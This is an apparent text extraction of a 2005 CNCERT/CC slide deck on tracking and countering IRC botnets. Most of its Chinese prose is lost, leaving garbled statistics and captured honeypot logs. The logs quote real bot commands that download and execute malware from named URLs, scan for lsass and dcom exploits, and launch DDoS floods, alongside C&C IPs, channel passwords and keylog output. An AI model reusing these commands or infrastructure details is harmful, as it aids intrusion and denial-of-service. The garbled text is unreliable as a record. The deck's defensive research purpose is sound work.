cncert/cc 关于僵尸网络的应对措施

CNCERT/CC

20051117

National Computer network Emergency Response technical Team/Coordination Center of China

CNCERT/CC


//Virus/Trojan/WormDoS/DDoS Spam


APWG VENDER(MS, AV company)2004ISP ComcastComcast888ComcastBotNet TrendLabs20049923.5200410 SANS DoS 4200411APWG,PhishingBotNet2004KorgoGaoBotSdBotBotNet3WittyCaidaBotNet100


Botnet

3.6 cents per bot week

6 cents per bot weekSeptember 2004 postings to SpecialHam.com, Spamforum.biz

20047Zombie103(BotNet)(phishing)100 >20-30k always online SOCKs4, url is de-duped and updated every >10 minutes. 900/weekly, Samples will be sent on request. >Monthly payments arranged at discount prices.>$350.00/weekly - $1,000/monthly (USD) >Type of service: Exclusive (One slot only)>Always Online: 5,000 - 6,000>Updated every: 10 minutes


IRCHoneypot)honeynet project

IDS+IRC863917 BOTbot botbot DdoSVax


IRC


IPport (): channel()Host.login passhostbotBotlogin.update.download.uninstall


1() 2 ()

1C&C 2;

BotBOT?


CNCERT/CCTop 563919593

hotgirls29624ipscan s.s.s.s dcom2 86400 256 8000 sdcombot* wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e s(df.exedefrag32)


(200563-6 23)IRC C&C Server : 34 :18; :5; :4; :2; :2; 1;: 1; :1.

Chart3

48911

57262

50209

41912

17240

22911

20418

15237

Statistics of user clients of large scale botnets

BOTNET

bothunter6/22/05

IP

20050603#NT#24.14.213.135##NT##1128NTExploitingIP

#NULLROOT#

#liquid#

#OMGLOLBBQ#

#hotgirls#80.191.168.20#hotgirls#39084dcombot* wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e -sdf.exedefrag32

209.200.13.84

80.191.168.20

#veryhotgirls#

##pwned##207.105.182.101##pwned##2948##y00## Dowmloanding update from

##y00##http://65.75.134.170/~wxware/test/Service.exer

#Hellas195.204.1.132#Hellas5751

#

48911

20050608#fat fuckoffh00ker81.74.132.235#fat fuckoffh00ker192Download http://sentinel.sp1d3y.nl/own2.exeha.exeNTIP

#visitors tricky

#xt-nt fuckoffh00ker

#hotgirls#80.191.168.20#hotgirls#39000dcombot* wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e -sdf.exedefrag32

209.200.13.84

80.191.168.20

#veryhotgirls#

#master#220.151.115.232#master#6265

##NT##24.14.213.135##NT##5046IP Exploit

#OMGLOBBQ##NULLROOT# [DDOS]Flooding :(216.73.112.201) for

#NULLROOT#650 seconds

#lc-wks202.67.155.250#lc-wks5640NTIP

#SeR 654321211.221.205.58#SeR1119IP 445 FTP

57262

20050610#omgyay 0mg207.58.134.228#omgyay 0mg332ExploitingIP

#hotgirls#80.191.168.20#hotgirls#27014dcombot* wormride -s -t

209.200.13.84

80.191.168.20

#veryhotgirls#

#Brappy81.75.86.50#oG#10271

#hipsi sdadfasd23dfadas423

#Brappy

#12a asdasfGTSdzszsar3

#13b sdadfasd23dfadas423

##NT##24.14.213.135##NT##2874NTIP Exploit

222.104.230.23#OMGLOBBQ##NULLROOT# [DDOS]Flooding :(216.73.112.20180) for

#NULLROOT#650 seconds

#lc-wks202.67.155.250#lc-wks3132NTIP

#SeR 654321211.221.205.58#SeR 6543216586IP 445 FTP

209.170.170.16#For3#

#fearme#

50209

20050613#omgyay 0mg207.58.134.228#omgyay 0mg796ExploitingIP67.39.199.177218.56.76.142

67.39.199.177#Gunzup Robpwns67.39.199.177218.56.76.142

218.55.76.142cmd=PRIVMSG;para=#:[UPDATE]:Downloading update from: http://www.reznzdr.com/rBot.exe;

cmd=PRIVMSG;para=#:[UPDATE]:Downloading update from: http://www.reznzdr.com/asnstolen.exe;

#Gunzup Robpwns IP61.174.215.9#SeR 654321IP211.23.16.105

#hotgirls#80.191.168.20#hotgirls#29624dcombot* wormride -s -t

209.200.13.84

80.191.168.20

#veryhotgirls#

##master##208.53.169.142#Master1133##master##IP 207.108.170.75

207.167.215.35##master##

207.108.170.75##xanax##Downloading update from: http://65.75.134.170/~wxwarez/test/Service.exe

207.164.223.19##Go.DJ####xanax##IP 208.53.169.142[DOWNLOAD]:Link o Dns Not Trovato SUKKIAMELO!:

130.239.38.130http://ciudad.lationl.com/777/reelay.exe

#!pwn 133766.45.255.131#!pwn 1337

#.b0tz elite7359NTIP Exploit

#spyware FBISUCK#spyware Downloading http://s119796543.onlinehome.us/Lower.exe..;

#asnexhttp://s119796543.onlinehome.us/tc.exe..;

#asnhttp://s119796543.onlinehome.us/yoursite.exe..;

#!pwn-roothttp://s119796543.onlinehome.us/tc.exe..;

66.45.255.131KEYLOG

cmd=PRIVMSG;para=#phattykeylog: (-Micros) [Del][CTRL] (Changed window)

#SeR 654321211.221.205.58#SeR 6543213000IP 445 FTP

#For3#

#fearme#

41912

20050615#hotgirls#80.191.168.20#hotgirls#10018dcombot* wormride -s -t

209.200.13.84

80.191.168.20

#veryhotgirls#

#betty218.207.9.11#betty4805IPDcomIPNT

##WHOR3Z###betty DDOS

##FBOMED#cmd=PRIVMSG;para#betty : [SYN] Flooding : (24.62.139.80)for 111111111 seconds

cmd=PRIVMSG;para#betty :[DOWNLOAD] : Link o Dns Non Trovato SUKKIAMEL! : http//www.tapionirc.altervista.org/mh.exe

#ne061.167.82.194#ne0151IP ,DcomIP

#n03cmd=PRIVMSG;para=#ne0:[DOWNLOAD]:Downloading URL : http://www.freewebs.com/matflp/undertow.exe to c:/undertow.exe -e

#ne0n

##master##207.168.215.35##master##1606IP

38.115.133.226##pwned####pwend##

207.164.233.19##y00####master##

213.88.181.70##fatality##cmd=PRIVMSG;para=##master## : [MAIN]: Removing Bot

#!pwn 133766.45.255.131#!pwn 1337660NTIP Exploit

#.b0tz elite#spyware Downloading http://s119796543.onlinehome.us/Lower.exe..;

#spyware FBISUCKhttp://s119796543.onlinehome.us/tc.exe..;

#asnexhttp://s119796543.onlinehome.us/mt.exe.

#asn

#!pwn-root

17240

20050617##master##207.168.215.35##master##1321IP

38.115.133.226##pwned####master## cmd=PRIVMSG;para=##master## : [MAIN]: Removing Bot

207.164.233.19##y00####y00##FTP

##fatality##

#betty b1xvgf218.207.9.11#fbomed#10242##fbomed## [DDoS]:Flooding: (67.159.18.197:6667) for 300 seconds

#betty b1xvgf#boilerhouse# Dcom135lIP

#boilerhouse flash218.207.9.1181.230.22.5180.100.68.87

81.230.22.51 ###LeoNarDo###

80.100.22.51 #.#smash3r#.#

1211

#hotgirls80.191.168.20#hotgirls6338

61.152.146.238#veryhotgirlsdcombot

209.200.13.84* wormride -s -t

24.21.203.98

24.184.193.250

209.200.13.84

#ne061.167.82.194#ne087IP ,DcomIP

#n03

#ne0ncmd=PRIVMSG;para=#ne0:[DOWNLOAD]:Downloading URL : http://www.freewebs.com/matflp/undertow.exe to c:/undertow.exe -e

cmd=PRIVMSG;para=#ne0:[DOWNLOAD]:Downloading URL : http://www.goa_irc.co.uk/wosten/new4.exe to new4.exe

#bitch fuckinghoe210.108.10.150#bitch fuckinghoe4923

211.226.12.159#blah

#bleh

#h2o pizpwna

#meh nizzle

#test fuckinghoe

22911

20050620#ne061.1673.82.194#ne028

##xdcc##

##ownage##

#hotgirls209.200.13.84#hotgirls13049dcombot

61.153.201.2#veryhotgirls

218.22.25.142#xotgipls

#NULLROOT222.104.230.41#NULLROOT#295

#OMGLOLBBQ#

#kush#

#AIM#24.14.213.135#AIM# AOLOL83

#0x7f shameep

#12a asdasfGTSdzszsar3211.78.141.148#12a asdasfGTSdzszsar3;6963

#13b sdadfasd23dfadas423;

#ago-priv trouble;

#brap rotasgobrap;

#brappy asd3sadasdsadgfsd;

#decomp sdadfasd23dfadas423;

#fbsd lovesme;

#FC asdasfGTSdzszsar3;

#fuk3d lovesme;

#hipsi sdadfasd23dfadas423;

#hound lovesme;

#linux lovesme;

#marissa lovesme;

#n0 3nt3r;

#newmsn pass;

#nicole.com lovesme;

#nix lovesme;

#oG# unknown;

#ssh lovesme;

#tX lovesme;

20418

20050622#fbomed#218.207.9.11##fbomed## FUCK3R4014

#sluTTy# p1mp3d

#betty b1xvgf

#boilerhouse flash

#eWg-BOT

#NULLROOT222.104.230.41#NULLROOT#729

#OMGLOLBBQ#

#OMG#

#hotgirls209.200.13.84#hotgirls6322dcomb

61.153.201.2#veryhotgirls

#omgyay66.45.249.155#Gunzup Robpwns99IP

#omgyay 0mg

#12a asdasfGTSdzszsar3211.78.141.148#12a asdasfGTSdzszsar3;4073

#13b sdadfasd23dfadas423;

#ago-priv trouble;

#brap rotasgobrap;

#brappy asd3sadasdsadgfsd;

#decomp sdadfasd23dfadas423;

#fbsd lovesme;

#FC asdasfGTSdzszsar3;

#fuk3d lovesme;

#hipsi sdadfasd23dfadas423;

#hound lovesme;

#linux lovesme;

#marissa lovesme;

#n0 3nt3r;

#newmsn pass;

#nicole.com lovesme;

#nix lovesme;

#oG# unknown;

15237

1234567891011121314151617

hotgirlsbettyNULLROOTbitch fuckinghoeBrappyfat fuckoffh00kerHellaslc-wksmasterne0NTomgyay 0mgpwn 1337pwnedSeR 654321AIM12a asdasfGTSdzszsar3

reserved-38506x1f

reserved-38511x1f

reserved-38513x1f

reserved-38516x1f

reserved-38518x1f

reserved-38520x1f

reserved-38523x1f

IP

20050618-20050620#ne061.167.82.194cmd=TOPIC;para=#ne0 : download http://goa-irc.co.uk/wosten/new3.exe 1;

##xdcc##

##ownage##

20050620-20050622#fbomed#218.207.9.11cmd=PRIVMSG;para=#eWg-BOT:.(UPDATE):Downloading update from :http://champion.altervista.org/suk.exe

IP

210.108.10.15020

211.221.205.585

211.226.12.1594

218.55.76.1422

222.104.230.232

207.58.134.2281

207.105.182.1011

207.108.170.751

207.164.223.191

207.164.233.19

207.167.215.3535

207.168.215.35

207.58.134.228

208.53.169.142

209.170.170.16

209.200.13.84

24.14.213.135

24.184.193.250

24.21.203.98

38.115.133.226

66.45.255.131

67.39.199.177

80.191.168.20

195.204.1.132

220.151.115.232

130.239.38.130

213.88.181.70

202.67.155.250

81.74.132.235

81.75.86.50

61.167.82.194

218.207.9.11

61.152.146.238

61.167.82.194

211.78.141.148

24.14.213.135

66.45.249.155

38506.048911

38511.057262

38513.050209

38516.041912

38518.017240

38520.022911

38523.020418

38525.015237

Statistics of user clients of large scale botnets

#hotgirls#

38,50639084

38,51139000

38,51327014

38,51629624

38,51810018

38,5206338

38,52313049

38,5256322

Hotgirls


15(2005819919)

Chart2

157142

83263

53366

18753

25795

17333

24054

23266

19906

21498

diablo

Sheet2

Sheet1

IP

1!cz2cezkareserved-38583x1fDiablo157142205.209.149.40

2!pwn1337reserved-38586x1f83263

3123456789reserved-38588x1f53366

412aasdasfGTSdzszsar3reserved-38590x1f18753

5aabcreserved-38593x1f25795

6AIMreserved-38595x1f17333

7asnreserved-38597x1f24054

8asnFBISUCKreserved-38602x1f23266

9bbotreserved-38609x1f19906

10bettyreserved-38614x1f21498

11bettyb1xvgf

12bitchfuckinghoe

13blah

14boilerhouseflash

15Brappy

16CaMz-R

17com

18dd0s

19diablo

20DWdepth

21Eddie

22fatassfat20

23fatfuckoffh00ker

24fbomed

25h2

26hellas

27hotgirls

28lc-wks

29Master

30MP3

31msn

32ne0

33NewBot

34NT

35NULLROOT

36omgyay

37omgyay0mg

38phat

39phatbot

40pwned

41ruff

42SeR654321

43sKull

44staff

45wubix

45

2005.06.032005.09.19

Sheet1

diablo

Sheet3

157142


gunit

829 12PRIVMSG #asnftp :.login booties -s;cmd=:[email protected] #nesebot :.login nesebot -s;cmd=:gunit!DIE@nesePRIVMSG #urxbot :.login prx -s;cmd=:[email protected];TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunit;TOPIC #.asnftp :.advscan asn1smb 100 3 0 -r -s;cmd=:gunit;TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunitTOPIC #forasn :.adv.start asn 120 5 0 -r;cmd=:gunit;TOPIC #phat# :.scan.startall;cmd=:gunit; TOPIC #urxbot :.advscan dcom135 500 3 0 -r;cmd=:gunit;(2005829)


(Life Cycle)botnet creation) Deloder/Mytob/Zotob 2005.9.18 9:00 332 [botz]-96018 #ass :!upd4t3z http://peckno.site.voila.fr/win2k.exe the [botz]-96018 67.43.*.*:6667 JOIN #suce fuck. :r00t.expl01t3d.org 332 Suce-548836 #suce :-ntscan 254 1000 -a b


(Life Cycle)botnet spreadTOPIC ##asn-new## :.advscan asn1smb 400 3 0 -r -b sTOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -r sTOPIC #xdcc4 :@sadvscan asn1smb 150 5 0 201.5.x.xTOPIC #XOwneD :!ntscan 350 1000 -a -b;TOPIC #111 :.advscan lsass_445 100 5 120 -r332 nffe #fanta :.scan pnp 50 6000 221332 #bot :$advscan WksSvcOth 400 5 0 221.x.x.x -b -r;332 #tvr0x :^advscan dcom135 300 5 0 -r s332 #Rxx :.asc -S -s!.ntscan 40 5 0 -b -r -e -h!.asc PnP 40 10 0 -b -r -e -h!332 ...#r00x %advscan dcom135 300 5 0 -r -b s332 ...#asn :.scanall s332 ...#.wadside :`adv.start lsass 150 6 9999 -b -r s332 ...#.pwnt. :.xscan msass 300 5 0 -b -s;332 ...#.#smash3r#.# :.root.start msass 200 0 5 -a -r s332 ...##scarezsql## :-scan.startall!-bot.secure -s!-scan.addnetrange x.x.x.x/16 100


(Life Cycle)botnet transfer1. IRC Server()2. IRC Server;3. IRC ServerBot2005927


(Life Cycle)botnet updateBotTOPIC PRIVMSG 2005.9.18 8.am:[email protected] #hb3 :.hell.download http://elizabethwargo.com/cannon/php1/images/duh.exe explore.exe -e;cmd=;TOPIC #rooted :@sdownload http://site.voila.fr/qhzteam/asn.exePRIVMSG ##em :!upadfkadf http://w00tage.com/stolen2.exe stolenBot 20050919 02NotaBot:

PRIVMSG #NotaBot :.spread.remove.module mssql\r\nPRIVMSG #NotaBot :.spread.remove.module dcom1\r\nPRIVMSG #NotaBot :.spread.add.module vnc_scan\r\nPRIVMSG #NotaBot :.spread.add.module radmin_empty\r\n


(Life Cycle)Botnet Activity spyware

220050919 12PRIVMSG #NotaBotslog :[ VNC Found ] :218.14. *.*:111111 //VNC

PRIVMSG #NotaBot: Active Modules : ms04011 ipc wins netdde veritas vnc_scan radmin_empty//

0927 20 TOPIC ##bla :.ddos.random 81.169. *.* 80 120//


(Life Cycle)Botnet decease

1C&C servers()DDNS /DNS

2C&C serverbot

3 bot

4

5( .remove/.uninstall)

6bot


CNCERT/CC1 200412863-917IRC BotNet2 IRC BotNet20057Honeypot3 BotNet4 BotNet,Bot5 Bot,6 ,Bot


DDOS

1

2DDOSBotNet


() BKDR_VB.CQ

\urlHTTPSMTP


() IRC

anthony.ipv6.usr.aswind.com peter.freehost.aswind.net carlyle.dns2go.aswind.net khond.vip.vhost.ourmidi.com lamen.vhost.ourmidi.com massuse.ipv6.free.ourmidi.net bruce.free.ourmidi.net john.usr.aswind.com


IP

216.152.*.*6667 212.204.*.* 6667 64.12.*.* 6667 207.68.*.* 6667 61.197.*. * 8000 218.157. *. * 443 221.146. *. * 554 219.153. *. * 8000

202.108.*.*IP


()

BotNet

12106000080003712

IP60.2.*.*ADSL


()() 1171641 IPBKDR_VB.CQ156120


()215521(200412132005110)


()

CNCERT/CC


()

() BotNet 1CNCERT http://www.cert.org.cn/articles/tools/common/2004123022037.shtml 2


()3


rasinf.exe,ipxsrv.exeipxsrv.exe,QQ,IEipxsrv.exe, msapp.exerasinf.exe, rasinf.exeIPCKuang2kuang2(k2.exe)kuang2msapp.exe.1200223200410 Botnet


1 C&C Server2 Bot3 C&C Server4 5 botnet


CNCERT/CCWEBSITE: WWW.ORG.CNTEL: 8299 0999 () +86-10-8299 1000EMAIL:[email protected]


[email protected]

BotNet2004BotNetSpamDDosBotBotnet BotNet200420033

DDoSIdentity theftbotbotHoneywallbot200411200531HoneyWall1mwcollect[8],18030550080020041120051406Ddos179[4]

1bot(fast joining bots) botsIRCIRC2) bot(Long standing connection) botsbot(not talkative)Botsbotping/pongDdoSVax[5]BotIDSbotbotbotbotbot,IDSIRCIDSIRCBotIRCIRC RFCIDSbotIRCIRCIDSbotIDSsocks v4ServerTOPIC #rBot :.advscan lsass 200 5 0 -r sa->TOPIC#rBot :.advscan lsass 200 5 0 -r s\nb->TOPIC#rBot :.advscan lsass 200 5 0 -r s\nc) Botnetbot

cncert/cc 关于僵尸网络的 应对措施

Documents

cncert/cc 关于僵尸网络的应对措施